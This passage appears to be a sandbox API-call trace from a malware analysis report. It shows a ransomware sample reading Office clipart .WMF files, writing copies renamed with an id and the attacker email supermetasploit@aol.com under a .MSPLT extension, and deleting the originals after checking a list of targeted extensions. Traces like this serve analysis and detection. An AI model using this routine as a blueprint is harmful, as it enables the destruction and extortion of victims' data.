(lpString=".doc") returned 4 [0310.833] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.833] lstrlenW (lpString=".docx") returned 5 [0310.833] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.833] lstrlenW (lpString=".pdf") returned 4 [0310.833] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.833] lstrlenW (lpString=".xls") returned 4 [0310.833] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.833] lstrlenW (lpString=".xlsx") returned 5 [0310.833] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.833] lstrlenW (lpString=".ppt") returned 4 [0310.833] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.833] lstrlenW (lpString=".zip") returned 4 [0310.833] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.833] lstrlenW (lpString=".rar") returned 4 [0310.833] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.833] lstrlenW (lpString=".bz2") returned 4 [0310.833] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString=".7z") returned 3 [0310.834] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.834] lstrlenW (lpString=".dbf") returned 4 [0310.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.834] lstrlenW (lpString=".1cd") returned 4 [0310.834] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.834] lstrlenW (lpString=".jpg") returned 4 [0310.834] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.834] lstrlenW (lpString=".doc") returned 4 [0310.834] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString=".docx") returned 5 [0310.834] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0310.834] lstrlenW (lpString=".pdf") returned 4 [0310.834] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0310.834] lstrlenW (lpString=".xls") returned 4 [0310.834] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0310.834] lstrlenW (lpString=".xlsx") returned 5 [0310.834] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0310.834] lstrlenW (lpString=".ppt") returned 4 [0310.835] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0310.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.835] lstrlenW (lpString=".zip") returned 4 [0310.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0310.835] lstrlenW (lpString=".rar") returned 4 [0310.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0310.835] lstrlenW (lpString=".bz2") returned 4 [0310.835] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0310.835] lstrlenW (lpString=".7z") returned 3 [0310.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0310.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.835] lstrlenW (lpString=".dbf") returned 4 [0310.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0310.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.835] lstrlenW (lpString=".1cd") returned 4 [0310.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0310.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 68 [0310.835] lstrlenW (lpString=".jpg") returned 4 [0310.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0310.835] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0310.836] lstrlenW (lpString="BS00184_.WMF") returned 12 [0310.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x530 [0311.885] GetFileSizeEx (in: hFile=0x530, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=4976) returned 1 [0311.885] CloseHandle (hObject=0x530) returned 1 [0311.885] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf")) returned 0x220 [0311.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.394] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.394] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0312.395] GetLastError () returned 0x0 [0312.395] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1370, lpOverlapped=0x0) returned 1 [0312.409] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1380, lpOverlapped=0x0) returned 1 [0312.411] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.411] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0312.411] SetEndOfFile (hFile=0x51c) returned 1 [0312.419] CloseHandle (hObject=0x51c) returned 1 [0312.421] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.421] SetEndOfFile (hFile=0x544) returned 1 [0312.427] CloseHandle (hObject=0x544) returned 1 [0312.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.428] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf")) returned 1 [0312.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.430] lstrlenW (lpString=".doc") returned 4 [0312.430] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.430] lstrlenW (lpString=".docx") returned 5 [0312.430] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.430] lstrlenW (lpString=".pdf") returned 4 [0312.430] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.430] lstrlenW (lpString=".xls") returned 4 [0312.430] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.430] lstrlenW (lpString=".xlsx") returned 5 [0312.430] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.431] lstrlenW (lpString=".ppt") returned 4 [0312.431] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.431] lstrlenW (lpString=".zip") returned 4 [0312.431] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.431] lstrlenW (lpString=".rar") returned 4 [0312.431] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.431] lstrlenW (lpString=".bz2") returned 4 [0312.431] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.431] lstrlenW (lpString=".7z") returned 3 [0312.431] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.431] lstrlenW (lpString=".dbf") returned 4 [0312.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.432] lstrlenW (lpString=".1cd") returned 4 [0312.432] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.432] lstrlenW (lpString=".jpg") returned 4 [0312.432] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.432] lstrlenW (lpString=".doc") returned 4 [0312.432] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.432] lstrlenW (lpString=".docx") returned 5 [0312.432] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.432] lstrlenW (lpString=".pdf") returned 4 [0312.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.432] lstrlenW (lpString=".xls") returned 4 [0312.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.432] lstrlenW (lpString=".xlsx") returned 5 [0312.433] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.433] lstrlenW (lpString=".ppt") returned 4 [0312.433] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.433] lstrlenW (lpString=".zip") returned 4 [0312.433] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.433] lstrlenW (lpString=".rar") returned 4 [0312.433] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.433] lstrlenW (lpString=".bz2") returned 4 [0312.433] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.433] lstrlenW (lpString=".7z") returned 3 [0312.433] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.433] lstrlenW (lpString=".dbf") returned 4 [0312.433] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.434] lstrlenW (lpString=".1cd") returned 4 [0312.434] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 68 [0312.435] lstrlenW (lpString=".jpg") returned 4 [0312.435] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.436] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.436] lstrlenW (lpString="BS00439_.WMF") returned 12 [0312.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.437] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=2052) returned 1 [0312.438] CloseHandle (hObject=0x544) returned 1 [0312.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf")) returned 0x220 [0312.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.439] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.439] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.439] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0312.440] GetLastError () returned 0x0 [0312.440] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x804, lpOverlapped=0x0) returned 1 [0312.477] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x810, lpOverlapped=0x0) returned 1 [0312.478] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.479] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0312.479] SetEndOfFile (hFile=0x51c) returned 1 [0312.479] CloseHandle (hObject=0x51c) returned 1 [0312.484] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.484] SetEndOfFile (hFile=0x544) returned 1 [0312.557] CloseHandle (hObject=0x544) returned 1 [0312.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00439_.wmf")) returned 1 [0312.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.559] lstrlenW (lpString=".doc") returned 4 [0312.559] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.559] lstrlenW (lpString=".docx") returned 5 [0312.559] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.559] lstrlenW (lpString=".pdf") returned 4 [0312.559] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.559] lstrlenW (lpString=".xls") returned 4 [0312.559] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.559] lstrlenW (lpString=".xlsx") returned 5 [0312.559] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.559] lstrlenW (lpString=".ppt") returned 4 [0312.559] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.560] lstrlenW (lpString=".zip") returned 4 [0312.560] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.560] lstrlenW (lpString=".rar") returned 4 [0312.560] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.560] lstrlenW (lpString=".bz2") returned 4 [0312.560] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.560] lstrlenW (lpString=".7z") returned 3 [0312.560] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.560] lstrlenW (lpString=".dbf") returned 4 [0312.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.560] lstrlenW (lpString=".1cd") returned 4 [0312.560] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.560] lstrlenW (lpString=".jpg") returned 4 [0312.560] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.561] lstrlenW (lpString=".doc") returned 4 [0312.561] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.561] lstrlenW (lpString=".docx") returned 5 [0312.561] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.561] lstrlenW (lpString=".pdf") returned 4 [0312.561] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0312.561] lstrlenW (lpString=".xls") returned 4 [0312.561] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0312.561] lstrlenW (lpString=".xlsx") returned 5 [0312.561] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0312.561] lstrlenW (lpString=".ppt") returned 4 [0312.561] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0312.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.561] lstrlenW (lpString=".zip") returned 4 [0312.561] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0312.561] lstrlenW (lpString=".rar") returned 4 [0312.561] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0312.562] lstrlenW (lpString=".bz2") returned 4 [0312.562] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0312.562] lstrlenW (lpString=".7z") returned 3 [0312.562] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0312.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.562] lstrlenW (lpString=".dbf") returned 4 [0312.562] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0312.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.562] lstrlenW (lpString=".1cd") returned 4 [0312.562] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0312.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00439_.WMF") returned 68 [0312.562] lstrlenW (lpString=".jpg") returned 4 [0312.562] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0312.562] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0312.563] lstrlenW (lpString="BS00443_.WMF") returned 12 [0312.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.563] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1676) returned 1 [0312.563] CloseHandle (hObject=0x544) returned 1 [0312.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf")) returned 0x220 [0312.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0312.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0312.564] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.564] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0312.640] GetLastError () returned 0x0 [0312.640] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x68c, lpOverlapped=0x0) returned 1 [0312.727] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x690, lpOverlapped=0x0) returned 1 [0312.729] ReadFile (in: hFile=0x544, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0312.729] WriteFile (in: hFile=0x51c, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0312.729] SetEndOfFile (hFile=0x51c) returned 1 [0312.730] CloseHandle (hObject=0x51c) returned 1 [0312.731] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0312.731] SetEndOfFile (hFile=0x544) returned 1 [0312.736] CloseHandle (hObject=0x544) returned 1 [0312.737] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0312.738] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00443_.wmf")) returned 1 [0312.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00443_.WMF") returned 68 [0312.739] lstrlenW (lpString=".doc") returned 4 [0312.739] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0312.739] lstrlenW (lpString=".docx") returned 5 [0312.739] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0312.739] lstrlenW (lpString=".pdf") returned 4 [0312.739] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 